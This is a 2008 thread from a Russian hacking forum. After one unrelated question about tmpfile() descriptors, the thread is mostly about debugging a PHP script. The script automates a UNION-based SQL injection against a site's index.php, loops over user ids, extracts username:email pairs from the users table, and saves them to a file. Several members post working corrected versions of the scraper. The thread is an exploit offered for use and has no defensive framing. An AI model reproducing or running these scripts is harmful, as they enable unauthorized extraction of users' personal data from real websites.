ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
24.01.2008, 19:10
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
Подскажите как узнать имя файла зная только его дескриптор? Например имя файла создаваемого функцией
tmpfile().
|
|
|
24.01.2008, 19:15
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от cash$$$
Подскажите как узнать имя файла зная только его дескриптор? Например имя файла создаваемого функцией
tmpfile().
никак, эта функция создает безымянные файлы и работает чисто с дескриптором
__________________
Карфаген должен быть разрушен...
|
|
|
|
24.01.2008, 19:35
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901
Репутация:
23
|
|
ребят укажите на мою ошибку...
вот скрипт который
1) открывает файл emails.txt для дальнейшей записи туда *( fopen('emails.txt','a+'); )*
2) перебирает id как переменную $i *( id=$i/*'; )*
3) ищет в загруженной странице слово root@"localhost
*(preg_match_all('|root@"localhost([^"]*)"|is',$str,$out)  *
и уже далее мыло которое идет следом за ним сохраняет в открытый emails.txt
Код:
<?
$handler=fopen('emails.txt','a+');
for($i=1;$i<30;$i++)
{
$filename = 'http://www.mysite.ru/index.php?t=-1+union+select+user(),concat(username,char(58),email)+from+users+WHERE+id=$i/*';
echo $i.". ";
$str = file_get_contents($filename);
preg_match_all('|root@"localhost([^"]*)"|is',$str,$out);
if(empty($out[1][0])) echo " no mail";
else{
echo " get ".$out[1][0];
fwrite($handler,$out[1][0]."\n");
}
echo "\n";
}
fclose($handler);
?>
но есть проблема .... он выводит в браузере что не нашел мыла а emails.txt заполняет самим html кодом...
в чем проблема? |
|
|
|
24.01.2008, 20:34
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
может потому что перемменая $i находится между апостофами тоесть '$i' тада интерпретатор считает это не как перемменую а как знак доллора и букву i?
Зачем тебе preg_match_all? ты мыльники у юзеров смотриш так они ж не будут по 10 мыл писать у каждого юзера 1 мыло =)
думаю тебе этого вполне хватит
PHP код:
<?
$handler=fopen('emails.txt','a+');
for($i=1;$i<30;$i++)
{
$filename = "http://www.mysite.ru/index.php?t=-1+union+select+user(),concat(username,char(58),email)+from+users+WHERE+id=$i/*";
echo $i.". ";
$str = file_get_contents($filename);
if(preg_match('|root@"localhost([^"]+)"|is',$str,$out) == 0) {echo " no mail";}
else{
echo " get ".$out['1'];
$save = $out['1']."\n";
fwrite($handler,$save);
}
echo "\n";
}
fclose($handler);
?>
Последний раз редактировалось Doom123; 24.01.2008 в 21:01..
|
|
|
|
24.01.2008, 23:46
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901
Репутация:
23
|
|
не помогло .. =(( что может быть не так .. ???
|
|
|
|
25.01.2008, 00:00
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Регулярка очень кривая. Но ничего точно сейчас сказать нельзя, потому что не совсем понятно что надо. Ссылку в студию.
|
|
|
|
25.01.2008, 00:35
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
не помогло .. =(( что может быть не так .. ???
странно проверял када в файлах мыльники вида root@"localhostE-mail@domain.com"
У меня всё прекрасно писало в файл хз что там не так ... может в скуле дело?
|
|
|
|
25.01.2008, 00:48
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
PHP код:
<?
$handler=fopen('emails.txt','a+');
for($i=1;$i<30;$i++)
{
$filename = "http://www.mysite.ru/index.php?t=-1+union+select+1,concat(0x2137333621,username,0x3a,email,0x2137333621)+from+users+WHERE+id=$i/*";
echo $i.". ";
$str = file_get_contents($filename);
if(preg_match('|!736!(.*)!736!|is',$str,$out) == 0) {echo " no mail";}
else{
echo " get ".$out[1];
$save = $out[1]."\n";
fwrite($handler,$save);
}
echo "\n";
}
fclose($handler);
?>
попробуй так, я пвыпимпши немного, так что ту с регулярками разбираться тоже особо не стал но ты не размышляй над кодом, а сначала попробуй, а потом размышляй
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 25.01.2008 в 00:58..
|
|
|
|
25.01.2008, 02:45
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901
Репутация:
23
|
|
=( не пашет , кстати может я просто в фильтре попутал .. ответ от запроса mysql inj идет следующий..
в тегах <title>root@localhost (Admin:admin@mysite.ru)</title>
|
|
|
|
25.01.2008, 03:39
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
А че ж ты мозги то паришь тогда:
PHP код:
<?
$handler=fopen('emails.txt','a+');
for($i=1;$i<30;$i++)
{
$filename = "http://www.mysite.ru/index.php?t=-1+union+select+1,concat(username,0x3a,email)+from+users+WHERE+id=$i/*";
echo $i.". ";
$str = file_get_contents($filename);
if(preg_match('|\((.*)\)|is',$str,$out) == 0) {echo " no mail";}
else{
echo " get ".$out[1];
$save = $out[1]."\n";
fwrite($handler,$save);
}
echo "\n";
}
fclose($handler);
?>
а первый мой код у тебя не работает, потому что ты sql запрос мой исправляешь, причем его (первый вариант) лучше использовать, а вобще действительно как Macro сказал нужна конкретная ссыль, а то так получается "свидание вслепую", я уж не стал тут понармальному делать все просто регулярку подсказал, потому что, без наглядности тут нормально не сделаешь, вобще у тебя в этом скрипте много бесполезных вещей (ну если не много то они все равно есть)
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 25.01.2008 в 03:48..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Комбинированный вид
